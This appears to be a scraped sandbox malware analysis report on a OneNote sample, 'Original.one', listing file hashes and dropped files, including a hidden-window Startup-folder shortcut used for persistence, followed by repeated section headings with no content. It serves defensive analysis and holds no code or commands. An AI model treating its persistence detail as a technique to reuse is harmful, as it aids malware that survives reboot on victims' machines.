C:\Users\user\AppData\Local\Temp\{FEC04CEE-032C-46B1-8E29-C90A05EE6A84}	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced	830632032C7DDBCCDE126F4BAE935540	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
C:\Users\user\AppData\Local\Temp\{FFA84DA8-2022-42CB-9F56-9EC206F00F40}	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)	data	0B1CF738D2C3D99B709D0AC07694E766	15B2457F33A78FCBC230D92D6221539683A05371	9AE64A5C34132199E42353997C1D1F73757AE183A07366EB31AA9E23C00929F1
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S1NW5J7K0BC7F9ORQZ0V.temp	data	0B1CF738D2C3D99B709D0AC07694E766	15B2457F33A78FCBC230D92D6221539683A05371	9AE64A5C34132199E42353997C1D1F73757AE183A07366EB31AA9E23C00929F1
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Wed Feb 8 02:53:44 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide	BB5CDC9B85FFA2D9C2F1B7AC11A9C28C	E0A6B0466F8131533F77DF44CB0D3C02E27D344A	163B176B972E639C21ED9EC37AEA05257F2D00FC3AB09B2E1DDC7B4EFE93E5E8

ID:	800789
Product:	CloudBasic
Start time:	19:52:22
Start date:	07.02.2023
Sample:	Original.one
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	f727e5b082e13d521668e2908b3b7607
SHA1:	4eb0f8309b33e7f79cfa2d37523690dbe1ad0c97
SHA256:	8529b2ec8ed9d701904b8e2560cb3f12d049fedecb588102b5baf6d7a4c7830a
Filetype:	Microsoft OneNote note (16024/2) 100.00%

Windows Analysis Report
Original.one

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Original.one

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Original.one